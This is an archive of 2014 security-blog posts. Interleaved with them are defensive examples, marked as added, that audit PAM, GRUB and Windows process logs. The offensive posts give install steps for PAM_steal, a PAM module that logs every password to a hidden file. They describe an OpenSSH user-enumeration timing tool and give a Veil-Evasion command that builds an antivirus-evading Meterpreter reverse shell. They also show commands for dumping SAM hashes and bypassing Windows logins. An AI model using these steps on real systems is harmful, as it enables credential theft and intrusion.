Jul 19, 2014

Tools: PAM_steal - Monitoring passwords via PAM

A typical pentest attack can be represented by the following schema:

perimeter -> command execution -> privilege escalation -> ...
The next step for pentesters is to gain privileges on other machines.
For example, this can be done by stealing credentials (one of many methods).
Passwords on the local machine are stored hashed, and cracking them is not attractive because of the time it takes.

SSH MITM (tool: http://www.signedness.org/tools/mitm-ssh.tgz) is a good one. It should be noted, though, that passwords are often shared between many services, so capturing them directly is also necessary.

PAM (Pluggable Authentication Modules) provides dynamic authorization for applications and services on a Linux system. Our password logger plugin for PAM can be found here: https://github.com/ONsec-Lab/scripts/tree/master/pam_steal

This is a good step to take after rooting machines during penetration tests.

Install process:
vim /etc/pam.d/common-auth
Add "auth required pam_steal.so" to it.
Then check /tmp/.steal.log: passwords from FTP, SSH and every other PAM-based daemon will be logged there!
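A defender's check for exactly this kind of change, added here as an example (it is not part of the original post or of the pam_steal project): it parses pam.d-style configuration and flags any module that is not on an allowlist of modules the host is expected to use. The sample common-auth text and the allowlist are constructed for the example.

```python
import re
from pathlib import Path

# Constructed sample of an /etc/pam.d/common-auth with an unexpected module line appended
# (sample text for this example, not a real file from any system).
SAMPLE_COMMON_AUTH = """\
# /etc/pam.d/common-auth - authentication settings common to all services
auth    [success=1 default=ignore]      pam_unix.so nullok_secure
auth    requisite                       pam_deny.so
auth    required                        pam_permit.so
auth    optional                        pam_cap.so
auth required pam_steal.so
"""

# Hypothetical allowlist: build it from the stock pam.d of a known-good image of the same distro.
KNOWN_MODULES = {"pam_unix.so", "pam_deny.so", "pam_permit.so", "pam_cap.so"}

# type  control  module [args]; control may be a bracketed expression, type may have a leading '-'
PAM_LINE = re.compile(r"^\s*-?(auth|account|password|session)\s+(?:\[[^\]]*\]|\S+)\s+(\S+)")

def parse_pam_modules(text):
    """Return the (type, module) pairs declared in one pam.d file, module reduced to its basename."""
    found = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = PAM_LINE.match(line)
        if m:
            found.append((m.group(1), Path(m.group(2)).name))
    return found

def unexpected_modules(text, known=KNOWN_MODULES):
    """Modules referenced in the file that are not on the allowlist, sorted for stable output."""
    return sorted({mod for _, mod in parse_pam_modules(text) if mod not in known})

def audit_pam_dir(pam_dir="/etc/pam.d", known=KNOWN_MODULES):
    """Walk a real pam.d directory and map each file name to its unexpected modules."""
    findings = {}
    for path in sorted(Path(pam_dir).iterdir()):
        if path.is_file():
            bad = unexpected_modules(path.read_text(errors="replace"), known)
            if bad:
                findings[path.name] = bad
    return findings
```

Run audit_pam_dir() on the host being checked; an allowlist miss is either a module you installed deliberately or a line someone added, and in both cases the module file's ownership and package membership are worth a look.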

Source: http://lab.onsec.ru/2014/07/pamsteal-plugin-released.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: OSUETA - A simple Python script to exploit the OpenSSH User Enumeration Timing Attack

OSUETA stands for OpenSSH User Enumeration Timing Attack and is a small script written in Python to exploit a bug present in versions 5.* and 6.* of OpenSSH. In these versions, during the authentication process, you may obtain a list of users on the system, discriminated by the time it takes the system to evaluate an arbitrarily long password.

If the user is present, the time it takes the server to respond is larger. For example, this tool can be useful in penetration testing to narrow a brute force attack down to the users found present on the system. The script also has the ability to launch a denial of service attack against the ssh service.
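Added example, not part of the original post or of OSUETA: a mock password check showing the behaviour the attack depends on (unknown users skip the expensive password computation) next to the uniform-cost version that closes the timing side channel. The user database, salt and hash function are constructed for the example, and a hash-call counter stands in for wall-clock time so the difference is deterministic.

```python
import hashlib
import hmac
import os

def slow_hash(password, salt):
    """Deliberately expensive password hash (stand-in for crypt() in the affected sshd)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 20_000)

# Constructed user database: only "alice" exists. Salt and password are sample values.
SALT = b"constructed-salt"
USERS = {"alice": (SALT, slow_hash("correct horse", SALT))}
# Dummy record used for unknown users so the same amount of work is always done.
DUMMY_SALT = os.urandom(16)
DUMMY_HASH = slow_hash("dummy", DUMMY_SALT)

class WorkCounter:
    """Counts password-hash computations; a deterministic proxy for response time."""
    def __init__(self):
        self.hashes = 0

def check_login_leaky(username, password, ctr):
    """Affected pattern: an unknown user returns before any password work, so a very long
    password takes noticeably longer for a real account than for a made-up one."""
    rec = USERS.get(username)
    if rec is None:
        return False
    ctr.hashes += 1
    return hmac.compare_digest(slow_hash(password, rec[0]), rec[1])

def check_login_uniform(username, password, ctr):
    """Countermeasure: hash against a dummy record when the user is unknown, then reject,
    so valid and invalid usernames cost the same and timing reveals nothing."""
    salt, stored = USERS.get(username, (DUMMY_SALT, DUMMY_HASH))
    ctr.hashes += 1
    ok = hmac.compare_digest(slow_hash(password, salt), stored)
    return ok and username in USERS
```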

Source: https://github.com/c0r3dump3d/osueta


Jul 17, 2014

Howto: Password Protection for Grub Bootloader in Ubuntu 14.04

1. Generate a password hash with the grub-mkpasswd-pbkdf2 command
2. Edit /etc/grub.d/00_header. Add these lines to the bottom of the file:
#### To protect the grub boot loader
cat << EOF
set superusers="youruser"
password_pbkdf2 youruser <hash_from_step_1>
EOF


3. Edit /etc/grub.d/10_linux, at line 117. Add "--users youruser" between "with Linux" and "os", such as:
title="$(gettext_printf "%s, with Linux %s (%s)" --users adminlocal "${os}" "${version}" "$(gettext "${GRUB_RECOVERY_TITLE}")")" ;;

4. Regenerate the GRUB configuration with grub-mkconfig:
# grub-mkconfig -o /boot/grub/grub.cfg

5. Done

** If you don't want the normal boot entry to ask for a password, add "--unrestricted" to that boot entry, such as:
menuentry 'Ubuntu' --class ubuntu --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-simple-d7a144cb-230e-4134-888e-a6e5840e26d0' --unrestricted
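A check for the result of the steps above, added as an example and not part of the original post: it reads a generated grub.cfg and reports the superusers, whether each of them has a password_pbkdf2 entry, whether any entry still uses the legacy plaintext "password" command, and which menu entries will prompt (neither --unrestricted nor --users). The grub.cfg excerpt is constructed for the example, with placeholder salt, hash and ids.

```python
import re

# Constructed excerpt of a generated /boot/grub/grub.cfg (placeholders, not real
# grub-mkpasswd-pbkdf2 output or real menu ids).
SAMPLE_GRUB_CFG = """\
set superusers="youruser"
password_pbkdf2 youruser grub.pbkdf2.sha512.10000.PLACEHOLDERSALT.PLACEHOLDERHASH
menuentry 'Ubuntu' --class ubuntu --class os $menuentry_id_option 'gnulinux-simple-PLACEHOLDER' --unrestricted {
    linux /vmlinuz root=/dev/sda1 ro
}
menuentry 'Ubuntu, with Linux 3.13.0-24-generic (recovery mode)' --class ubuntu --users youruser $menuentry_id_option 'gnulinux-recovery-PLACEHOLDER' {
    linux /vmlinuz root=/dev/sda1 ro recovery nomodeset
}
menuentry 'Memory test' --class memtest $menuentry_id_option 'memtest' {
    linux16 /boot/memtest86+.bin
}
"""

SUPERUSERS_RE = re.compile(r'set\s+superusers\s*=\s*"?([^"\s]+)"?')
PBKDF2_RE = re.compile(r"password_pbkdf2\s+(\S+)\s+grub\.pbkdf2\.")
PLAINTEXT_RE = re.compile(r"password\s+(\S+)\s+\S+")   # legacy plaintext 'password' command
MENUENTRY_RE = re.compile(r"menuentry\s+'([^']*)'(.*)")

def audit_grub_cfg(text):
    """Report superusers, how each menu entry is protected, and misconfigurations found."""
    superusers, pbkdf2_users, plaintext_users, entries = set(), set(), set(), []
    for raw in text.splitlines():
        line = raw.strip()
        if m := SUPERUSERS_RE.match(line):
            superusers.update(m.group(1).split(","))
        elif m := PBKDF2_RE.match(line):
            pbkdf2_users.add(m.group(1))
        elif m := PLAINTEXT_RE.match(line):
            plaintext_users.add(m.group(1))
        elif m := MENUENTRY_RE.match(line):
            opts = m.group(2)
            # --unrestricted: anyone may boot it; --users: listed users and superusers may;
            # neither: only superusers may boot or edit it, so a normal boot prompts.
            prot = ("unrestricted" if "--unrestricted" in opts
                    else "users" if "--users" in opts else "superusers-only")
            entries.append((m.group(1), prot))
    findings = []
    if not superusers:
        findings.append("no 'set superusers' line: the GRUB menu can be edited freely at boot")
    for u in sorted(superusers - pbkdf2_users):
        findings.append(f"superuser {u} has no password_pbkdf2 entry")
    for u in sorted(plaintext_users):
        findings.append(f"user {u} uses a plaintext 'password' line; use grub-mkpasswd-pbkdf2")
    return {"superusers": sorted(superusers), "entries": entries, "findings": findings}
```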


Jul 14, 2014

Howto: Bypassing AV with Veil-Evasion

Full article:: https://www.netspi.com/blog/entryid/234/bypassing-av-with-veil-evasion

There are a couple of built-in encoders in Metasploit (shikata ga nai is the most popular one), but their signatures have been added to many antivirus solutions, resulting in detection.
Veil-Evasion comes with thirty different payloads in C, C#, PowerShell and Python.
The Python versions stand out, simply because Python was (until recently) the only language in Veil-Evasion that supported Meterpreter reverse HTTPS connections. This is beneficial for shells because everything is encrypted with SSL, preventing the commands and results from being transmitted in the clear and potentially discovered by an IDS or IPS. Another benefit of Python is the ability to build contained payloads: all the Meterpreter code needed for the reverse HTTPS connection is already included, instead of only a stager that downloads the rest of the code to run.
Veil-Evasion also has command-line switches that allow for easy scripting, which makes it simple to generate dynamic Veil-encoded Meterpreter payloads. Below is an example of a Python reverse_https_contained Meterpreter executable with pyherion encoding being generated from the command line:

/root/tools/Github/Veil/Veil-Evasion/Veil-Evasion.py -p python/meterpreter/rev_https_contained -c LHOST= LPORT=443 use_pyherion=Y --overwrite -o malicious

Jul 13, 2014

Howto: Get your public IP from Command Prompt

nslookup myip.opendns.com resolver1.opendns.com
After that, check the result with http://www.iplocation.net/


Tools: RIPS - static source code analyser for PHP

RIPS is a static source code analyser for vulnerabilities in PHP web applications. It was released during the Month of PHP Security (www.php-security.org).
NOTE: RIPS 0.5 development is abandoned. A complete rewrite is in development and used as an academic prototype but not publicly available yet.

Source: http://sourceforge.net/projects/rips-scanner/


Secret Information of Android Phone

1. Complete Information About your Phone

Dial this number/code: *#*#4636#*#*

It gives you information about your phone and battery including,

- Phone information
- Battery information
- Battery history
- Usage statistics

2. Factory data reset

The following number/code will be used: *#*#7780#*#*

Dialing this code will give you a prompt with a 'Reset phone' button. If you don't want to reset, press cancel. If you choose to reset, the following data is removed:

- Google account settings
- System and application data and settings
- Downloaded applications

The following data is not removed:

- Current system software and bundled application
- Files on your SD card, like photos, music etc.

3. Format Android Phone

Number/code: *2767*3855#

This code formats your Android device, so use it only if absolutely necessary. The code performs a factory format on your device and removes all settings and files, including the internal memory storage. It reinstalls the phone's firmware, and there is no way to cancel this operation except removing the battery from the device.

4. Phone Camera Update

Number/code: *#*#34971539#*#*

This code will give you information about the camera on your phone. The following four menus are shown,

- Update camera firmware in image
- Update camera firmware in SD card
- Camera firmware version
- Firmware update count

Using the 'Update camera firmware in image' option has been known to make your camera stop working, so it is advisable to not choose that option.

5. End Call/Power

Number/code: *#*#7594#*#*

This code allows you to manipulate the function of the power on/off/lock button on your smartphone. Instead of getting the options for silent mode etc. you can choose to make it turn off the power directly.

6. File Copy for Creating Backup

Number/code: *#*#273283*255*663282*#*#*

This is a very useful code that lets you backup your images, media files, video, voice memo etc. You will get a file copy screen allowing you to backup images.

7. Service Mode

Number/code: *#*#197328640#*#*

The idea behind entering the Service Mode is that you can run various tests on your device using this.

8. WLAN, GPS and Bluetooth Test Codes:

There are various codes that you can use for this one.

- *#*#232338#*#* - Shows WiFi MAC Address

- *#*#1472365#*#* - GPS Test

- *#*#1575#*#* - Another GPS Test

- *#*#232331#*#* - Bluetooth Test

- *#*#232337#*# - Shows Bluetooth Device Address

9. Codes to get Firmware version information:

The following codes provide the firmware information about your device.

- *#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate

- *#*#1234#*#* - PDA and Phone

- *#*#1111#*#* - FTA SW Version

- *#*#2222#*#* - FTA HW Version

- *#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number

10. Codes to launch various Factory Tests:

There are various other factory tests that you can run on a smartphone.

- *#*#0283#*#* - Packet Loopback

- *#*#0*#*#* - LCD test

- *#*#0673#*#* OR *#*#0289#*#* - Melody test

- *#*#0842#*#* - Device test (Vibration test and BackLight test)

- *#*#2663#*#* - Touch screen version

- *#*#2664#*#* - Touch screen test

- *#*#0588#*#* - Proximity sensor test

- *#*#3264#*#* - RAM version

Source: http://www.efytimes.com/e1/fullnews.asp?edid=140681&magid=11


Howto: Dump Windows password hashes efficiently

The Security Accounts Manager (SAM) is a registry file in Windows NT and later versions, up to the most recent Windows 7. It stores users' passwords in a hashed format (LM hash and NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords.

Two widely known tools to dump the local users' hashes from the SAM file, given the Windows file system block device, are bkhive and samdump2:
  • bkhive - dumps the syskey bootkey from a Windows system hive.
  • samdump2 - dumps Windows 2k/NT/XP/Vista password hashes.
Example of retrieving the SAM hashes from a Windows partition /dev/sda1:
# mkdir -p /mnt/sda1
# mount /dev/sda1 /mnt/sda1
# bkhive /mnt/sda1/Windows/System32/config/SYSTEM /tmp/saved-syskey.txt
# samdump2 /mnt/sda1/Windows/System32/config/SAM /tmp/saved-syskey.txt > /tmp/hashes.txt
In the event that you do not have bkhive or samdump2 with you, you can fall back to copying the SYSTEM and SAM files from /mnt/sda1/Windows/System32/config to your USB stick and importing them into any tool that can extract the SAM hashes from them: Cain & Abel, creddump and mimikatz are some of the available tools.
Bypass login prompt

If you are looking into bypassing the login prompt rather than dumping users' password hashes, some smart people have come up with innovative approaches:
  • BootRoot is a project presented at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh, as an exploration of technology that custom boot sector code can use to subvert the Windows kernel as it loads. The eEye BootRootKit is a boot sector-based NDIS backdoor that demonstrates the implementation of this technology.
  • SysRQ2 is a bootable CD image that allows a user to open a fully privileged (SYSTEM) command prompt on Windows 2000, Windows XP, and Windows Server 2003 systems by pressing Ctrl+Shift+SysRq at any time after startup. It was first demonstrated at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh as an example of applied eEye BootRoot technology. Use the "create CD from ISO image" feature of your preferred CD burning software to create a bootable SysRq CD.
  • Kon-Boot is a prototype piece of software which allows changing the contents of a Linux kernel and Windows kernel on the fly (while booting). In its current compilation state it allows logging into a Linux system as the root user without typing the correct password, or elevating privileges from the current user to root. For Windows systems it allows entering any password-protected profile without any knowledge of the password.
Password reset

Alternatively you can boot the machine with the bootdisk live CD or USB stick and use the chntpw utility to reset any Windows local user's credentials.
The typical scenario here is that you have compromised a Windows machine by any means and have obtained shell access as an administrative user. First, you need to escalate your privileges to the SYSTEM user. A simple way is to use Sysinternals' PsExec utility:
C:\>psexec.exe -i -s cmd.exe
There are several other techniques too, but they are outside the scope of this post.
Another solution is to use regback.exe part of the Windows 2000 Resource Kit Tools. This is slightly easier as it only dumps the specific files:
C:\>regback.exe C:\backtemp\SAM machine sam
C:\>regback.exe C:\backtemp\SYSTEM machine system
If you cannot get regback.exe to work, on Windows XP and above use regedit.exe or reg.exe. Using reg.exe:
C:\>reg.exe save HKLM\SAM sam
The operation completed successfully
C:\>reg.exe save HKLM\SYSTEM sys
The operation completed successfully
Using regedit.exe:
  • Execute regedit.exe from Start / Run prompt.
  • Open up Computer\HKEY_LOCAL_MACHINE and right-click the SAM section and select Export.
  • Change the Save as type setting to Registry Hive Files and save as SAM.
  • Same steps with SYSTEM hive.
Lastly, you can also get the SAM and SYSTEM files from C:\Windows\repair\. However, this directory contains outdated copies of the original C:\Windows\System32\config\ files, so it might not reflect the current users' credentials.

The Metasploit Framework also has its own post-exploitation modules, Meterpreter built-in command and dated Meterpreter script to dump the SAM hashes. Details on how these pieces of code work within the framework and which techniques they implement can be found on these blog posts by HD Moore.

Needless to say, there are more options, and knowing which one to use within the target environment is important. To facilitate this task, I have listed the relevant tools, their capabilities, where they work and, most importantly, where they are known to fail, in this spreadsheet.
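Detection logic for the hive-dumping commands shown above (reg.exe save of the SAM/SYSTEM hives, regback.exe, psexec -s, copies out of C:\Windows\repair), added as an example and not part of the original post: a small rule set run over constructed process-creation records in the shape of Windows Event ID 4688 with command-line auditing enabled. The record layout and field names are assumptions for the example.

```python
import re

# Constructed process-creation records (Event ID 4688 shape, command-line auditing on); not real logs.
SAMPLE_EVENTS = [
    {"id": 4688, "user": r"CORP\jdoe",  "cmd": r"C:\Windows\system32\reg.exe save HKLM\SAM sam"},
    {"id": 4688, "user": r"CORP\jdoe",  "cmd": r"reg  save hklm\system sys"},
    {"id": 4688, "user": r"CORP\admin", "cmd": r"psexec.exe -i -s cmd.exe"},
    {"id": 4688, "user": r"CORP\ops",   "cmd": r"C:\Tools\regback.exe C:\backtemp\SAM machine sam"},
    {"id": 4688, "user": r"NT AUTHORITY\SYSTEM", "cmd": r"reg.exe query HKLM\SOFTWARE\Microsoft"},
    {"id": 4688, "user": r"CORP\jdoe",  "cmd": r"copy C:\Windows\repair\SAM D:\sam.bak"},
    {"id": 4624, "user": r"CORP\jdoe",  "cmd": r"reg save HKLM\SAM x"},   # not a 4688, ignored
]

# Each rule: (name, regex over the command line). Case-insensitive, tolerant of paths and extra spaces.
RULES = [
    ("reg_save_credential_hive",
     re.compile(r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|system|security)\b", re.I)),
    ("psexec_system_shell",
     re.compile(r"\bpsexec(?:\.exe)?\b.*\s-s\b", re.I)),
    ("regback_hive_dump",
     re.compile(r"\bregback(?:\.exe)?\b.*\bmachine\s+(?:sam|system)\b", re.I)),
    ("repair_dir_hive_copy",
     re.compile(r"\\windows\\repair\\(?:sam|system)\b", re.I)),
]

def classify(cmd):
    """Names of all rules matching one command line (empty list: nothing in this rule set fired)."""
    return [name for name, rx in RULES if rx.search(cmd)]

def detect(events):
    """Alerts for process-creation events whose command line matches a hive-dumping pattern."""
    alerts = []
    for ev in events:
        if ev.get("id") != 4688:
            continue
        hits = classify(ev["cmd"])
        if hits:
            alerts.append({"user": ev["user"], "rules": hits, "cmd": ev["cmd"]})
    return alerts
```

The same rules carry over to a SIEM query; the reg.exe rule in particular is low-noise, since legitimate administration rarely saves the SAM or SECURITY hive to a file.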


Tools: zer0m0n - driver for cuckoo sandbox

zer0m0n is a driver for Cuckoo Sandbox that performs kernel-level analysis during the execution of malware. There are many ways for a malware author to bypass Cuckoo detection: detecting the hooks, hard-coding the Nt* functions to avoid the hooks, detecting the virtual machine... The goal of this driver is to offer the user the choice between the classical userland analysis and a kernel analysis, which is harder to detect or bypass.
Currently, it works on Windows XP 32-bit and Windows 7 32-bit/64-bit machines.

Source:  https://github.com/conix-security/zer0m0n/
